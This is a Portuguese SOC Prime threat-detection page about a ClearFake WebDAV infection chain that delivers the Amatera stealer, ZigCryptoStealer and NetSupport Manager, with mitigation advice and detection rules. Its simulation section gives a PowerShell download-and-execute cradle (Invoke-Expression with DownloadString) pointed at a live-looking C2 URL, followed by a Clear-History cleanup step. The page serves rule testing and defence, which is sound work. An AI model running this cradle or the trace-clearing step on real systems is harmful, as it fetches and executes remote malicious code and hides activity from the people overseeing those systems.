SOC Prime Bias: High

09 Sep 2026 10:12 UTC

Cadeia de infecção ClearFake WebDAV entrega Amatera stealer, ZigCryptoStealer e NetSupport Manager

Author Photo
SOC Prime Team linkedin icon Seguir
Cadeia de infecção ClearFake WebDAV entrega Amatera stealer, ZigCryptoStealer e NetSupport Manager
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Uma campanha impulsionada pelo ClearFake está abusando do WebDAV e dos Cloudflare Workers para distribuir múltiplas cargas de malware. A carga principal, Amatera stealer, é projetada para exfiltrar credenciais e dados relacionados a criptomoedas. Cargas adicionais incluem ZigCryptoStealer, entregue através de um carregador NativeAOT, e instâncias não autorizadas do NetSupport Manager usadas para estabelecer acesso remoto.

Investigação

A Cisco Talos investigou a execução de DLLs suspeitas baseadas em WebDAV em uma organização governamental ucraniana. A análise revelou duas cadeias de infecção separadas: uma aproveitando um pf.ch carregador para implantar ZigCryptoStealer e um proxy reverso baseado em Go, e outra usando um verification.google carregador para instalar o NetSupport Manager.

Mitigação

As organizações devem restringir a execução a partir de caminhos WebDAV e UNC e monitorar comportamentos anômalos de rundll32.exe. Controles robustos de EDR devem ser usados para detectar técnicas como DLL hollowing e module stomping. As equipes de segurança também devem monitorar o uso não autorizado do NetSupport Manager e atividades suspeitas relacionadas à rede blockchain. behavior. Robust EDR controls should be used to detect techniques such as DLL hollowing and module stomping. Security teams should also monitor unauthorized NetSupport Manager usage and suspicious blockchain-related network activity.

Resposta

Caso atividade maliciosa seja detectada, os endpoints afetados devem ser isolados imediatamente para evitar a exfiltração adicional de dados. Os respondentes devem realizar forense de memória para identificar malwares residentes, como o Amatera. As equipes de segurança também devem buscar por execução de DLLs baseadas em WebDAV e atividades incomuns do PowerShell em todo o ambiente.

Fluxo de Ataques

Ainda estamos atualizando esta parte.

Detecções

Cadeias de Caracteres Suspeitas de PowerShell (via powershell)

Equipe SOC Prime
08 set 2026

LOLBAS Conhost (via cmdline)

Equipe SOC Prime
08 set 2026

Indicadores Possíveis de Ofuscação do PowerShell (via powershell)

Equipe SOC Prime
08 set 2026

Possível Abuso de Telegram Como Canal de Comando e Controle (via dns_query)

Equipe SOC Prime
08 set 2026

Comando e Controle Suspeito por Pedido DNS de Domínio de Primeiro Nível (TLD) Incomum (via dns)

Equipe SOC Prime
08 set 2026

IOCs (SourceIP) a detectar: cadeia de infecção ClearFake WebDAV distribui o Amatera stealer, ZigCryptoStealer e NetSupport Manager

Regras de IA do SOC Prime
08 set 2026

IOCs (DestinationIP) a detectar: cadeia de infecção ClearFake WebDAV distribui o Amatera stealer, ZigCryptoStealer e NetSupport Manager

Regras de IA do SOC Prime
08 set 2026

Comunicação C2 Sobre WebSocket Seguro Com Dubbedmuch Para Exfiltração de Dados [Proxy]

Regras de IA do SOC Prime
08 set 2026

Detectar Download e Execução de Script PowerShell do NetSupport Manager [Windows Powershell]

Regras de IA do SOC Prime
08 set 2026

Execução de DLL WebDAV via rundll32.exe [Criação de Processo do Windows]

Regras de IA do SOC Prime
08 set 2026

Execução de Simulação

Pré-requisito: O Check de Pré-Voo de Telemetria e Baseline deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente as TTPs identificadas e tem como objetivo gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão ao diagnóstico incorreto.

  • Narrativa de Ataque & Comandos: O adversário está simulando uma cadeia de infecção do “ClearFake”. O objetivo é implantar a ferramenta de acesso remoto NetSupport Manager para estabelecer persistência e controle remoto. Para evitar a detecção baseada em assinaturas de downloads de arquivos, o invasor usa um “one-liner” PowerShell que busca uma carga útil JavaScript/PowerShell de um servidor C2 remoto (https://kr.cedar2glanz.ru/jewel.js) e a executa diretamente no buffer de memória usando Invoke-Expression. Esta técnica deixa uma pegada mínima de disco.

  • Script de Teste de Regressão:

    # Script de Simulação: Imita a execução da carga útil da cadeia de infecção ClearFake
    # ATENÇÃO: Este script usa o URL malicioso específico definido na regra de detecção para desencadear um alerta.
    
    $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js"
    Write-Host "[+] Simulando download e execução maliciosos de PowerShell..." -ForegroundColor Yellow
    
    # Este comando imita o padrão exato: URL + IEX/Invoke-Expression
    # Utilizamos um bloco try/catch porque o URL está de fato inacessível/inativo,
    # mas a LINHA DE COMANDO DO PROCESSO ainda será registrada.
    try {
        Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl)
    } catch {
        Write-Host "[!] Comando executado (Erro de rede esperado, mas a telemetria deve ser gerada)." -ForegroundColor Cyan
    }
  • Comandos de Limpeza:

    # Nenhum arquivo é criado por esta simulação específica, pois é um teste de execução na memória.
    # No entanto, limpamos o histórico de comandos para remover vestígios da sessão de usuário local.
    Clear-History
    Write-Host "[+] Limpeza concluída. Nenhum artefato deixado no disco." -ForegroundColor Green